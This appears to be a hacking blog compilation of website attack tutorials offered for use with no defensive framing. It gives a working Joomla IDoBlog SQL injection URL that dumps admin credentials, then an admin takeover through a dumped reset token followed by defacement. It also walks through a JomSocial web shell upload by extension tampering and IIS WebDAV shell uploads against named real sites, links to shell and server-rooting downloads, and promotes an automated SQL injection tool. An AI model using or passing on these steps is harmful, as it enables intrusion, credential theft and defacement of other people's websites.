Joomla Hacking Tutorial

Introduction : Joomla! as Stable-Full Package is probably unhackable and 
If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!? 
Joomla is made of components and modules and there are some developers apart from 
official team that offer their solutions to improve Joomla. 
That components and modules mede by that other developers are weak spots!


I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can’t tell that I hacked Joomla!


Finding Exploit And Target : Those two steps could go in different order, depend what you find first target or exploit


Google dork: inurl:”option=com_idoblog”
Comes up with results for about 140,000 pages

joomla hacking


Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,​11,12,13,14,15,16+from+jos_users–


Exploit can be separated in two parts:


Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)


Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users–
This part looking for username and password from jos_users table


Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’


Go to:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally…


Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin


Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1–
Site is vulnerable


Inject Target


Open reiluke SQLiHelper 2.7
In Target copy


http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have 

joomla hacking

Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data


Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

joomla hacking

username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as 
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…


The easiest way to hack is to reset Admin password!


Admin Password Reset


Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request


joomla hacking
Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

username: admin
activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.


joomla hacking
If you done everything ok, Rest your Password page will load. Enter your new password…

After that go to:
http://www.site.com/administrator/
Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

joomla hacking
To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

JomSocial ~ Joomla Shell Upload Vulnerability


Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain 🙂

Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*

Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos

Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. “myshell”)
3. Copy the shell to the same folder and rename it to “yourshell.php.flv”
4. Now in your folder you have 2 files, “myshell.php” & “myshell.php.flv”.

Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.

Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called “myshell.php.flv”, is to trick the uploader into thinking that you are uploading a FLV file.

Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your “myshell.php.flv”.
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for “myshell.php.flv” then delete the .flv part meaning you will have “myshell.php” left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.

Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your “random.php”
6. And your IN!

How to r00t on server : E-book by Black -X Genius

hi Guys … I’m Got many maggesges in my inbox about server r00t.I think  too many pepole are intrested in Server r00t so today I’m Presneting My Tunsian Friend Black-X Genius’s Ebook On server r00ting. Hope You will Enjoy The book

http://i2.cdn.turner.com/cnn/2010/images/12/16/t1larg.hack.cnn.jpg

 This small book is will explain
you how professional hackers got root on servers.
this book is for beginner.

Leassons Of Book

Lesson 1– What is Root ?
Lesson 2– How can I get on the Root ?
Lesson 3 Local root and how to search for
him ?
Lesson 4– How connect the server ?
Lesson 5– How to get Root access ?
Lesson 6– What happen after the root ?
Lesson 7– The withdrawal of my domain ?
Lesson 8- How to do mass deface ?
Lesson 9– How to register the hacked
websites on Zoneh?
Lesson 10 How to clear tracks from serve ?

Download Link – http://www.mediafire.com/?tzmsm3l5d7zj864

How to Hack IIS Exploit websites : The Most Easiest way of Website Hacking


Now A Folder named “Web Folders” will open.

STEP 3: Now “Right-Click” in the folder and Goto “New” and then “Web Folder“. 


STEP 4: Now type the name of the Vulnerable site in this. e.g.” http://autoqingdao.com/ ” and click “Next“.


How to Hack IIS Exploit in Windows 7 : Detailed Tutorial with homepage hacking

IIS Exploit website Hacking in Windows Seven 7 Step By Step Explained with Images 
step 1–  click to see
(Go to My Computer, Do Right Cilck and Select Add a network Location)
Step 2- click to see
(click on Next)
Step 3- click to see
(click on Next)
step 4- click to see
(now enther The URL of vuln website and Click on Next, For example tka this site  http://www.myxixia.com/)
Step 5- Click to see
(click on next button)
step 6- click to see
(Now click on Finish)
Step 7- Click to see
(see Network Location Option And click on website folder)
Step 8- Now Download the Shell http://www.ziddu.com/download/16498227/shell.zip.html
step 9- Click to see
(After Downloading do right click on file and click on Extract here)
Step 10- Click to see
(Now copy the Power.asp;.jpg file and open the web folder of vuln website)
Step 11- Click to see
(now paste the power.asp;.jpg file in web folder)
Step 12- Click to see
(Paste Complete)
Step 12 – Click to see
(Now open Your Browser and enter The site addres and put Power.asp;.jpg after url for example  http://www.myxixia.com/power.asp;.jpg)
Step 13- Click to see 
( Now click on edit file index.asp)
Step 14- click to see
(open your deface html file. do right click and select open with notepad)
Step 15- click to see
(Copy all code)
Step 16- Click to see
(paste the all code in that popup which yu got after clicking edit index.asp and click on save)
Step 17- click to see 
(now you wil got a page tike this)
Step 18 You’ve done 🙂 now whne you will open that website you will got your deface page on home 🙂

BSQL Hacker : automated SQL Injection Framework Tool

It’s easy to use for beginners and provide great amount of customisation andautomation support for experienced users. Features a nice metasploit alike exploitrepository to share and update SQL Injection exploits.

BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database.
http://madmikesamerica.com/wp-content/uploads/2010/09/computer-virus-iran-power-nuclear.jpgBSQL Hacker aims for experienced users as well as beginners who want to automate SQL Injections (especially Blind SQL Injections).

Videos 

 New version is out, it’s mostly bug fixes :

images (160×46)http://labs.portcullis.co.uk/application/deep-blind-sql-injection/

 Screenshot

Key Features

  • Easy Mode
    • SQL Injection Wizard
    • Automated Attack Support (database dump)
      • ORACLE
      • MSSQL
      • MySQL (experimental)
  • General
    • Fast and Multithreaded
    • 4 Different SQL Injection Support
      • Blind SQL Injection
      • Time Based Blind SQL Injection
      • Deep Blind (based on advanced time delays) SQL Injection
      • Error Based SQL Injection
    • Can automate most of the new SQL Injection methods those relies on Blind SQL Injection
    • RegEx Signature support
    • Console and GUI Support
    • Load / Save Support
    • Token / Nonce / ViewState etc. Support
    • Session Sharing Support
    • Advanced Configuration Support
    • Automated Attack mode, Automatically extract all database schema and data mode
  • Update / Exploit Repository Features
    • Metasploit alike but exploit repository support
    • Allows to save and share SQL Injection exploits
    • Supports auto-update
    • Custom GUI support for exploits (cookie input, URL input etc.)
  • GUI Features
    • Load and Save
    • Template and Attack File Support (Users can save sessions and share them. Some sections like username, password or cookie in the templates can be show to the user in a GUI)
    • Visually view true and false responses as well as full HTML response, including time and stats
  • Connection Related
    • Proxy Support (Authenticated Proxy Support)
    • NTLM, Basic Auth Support, use default credentials of current user/application
    • SSL (also invalid certificates) Support
    • Custom Header Support
  • Injection Points (only one of them or combination)
    • Query String
    • Post
    • HTTP Headers
    • Cookies
  • Other
    • Post Injection data can be stored in a separated file
    • XML Output (not stable)
    • CSRF protection support (one time session tokens or asp.net viewstate ort similar can be used for separated login sessions, bypassing proxy pages etc.)